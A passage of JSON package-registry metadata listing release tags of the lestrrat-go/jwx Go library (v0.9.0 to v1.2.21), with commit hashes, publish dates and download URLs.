hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:58.201Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.082177034635306,"dependent_packages_count":5.700411654884096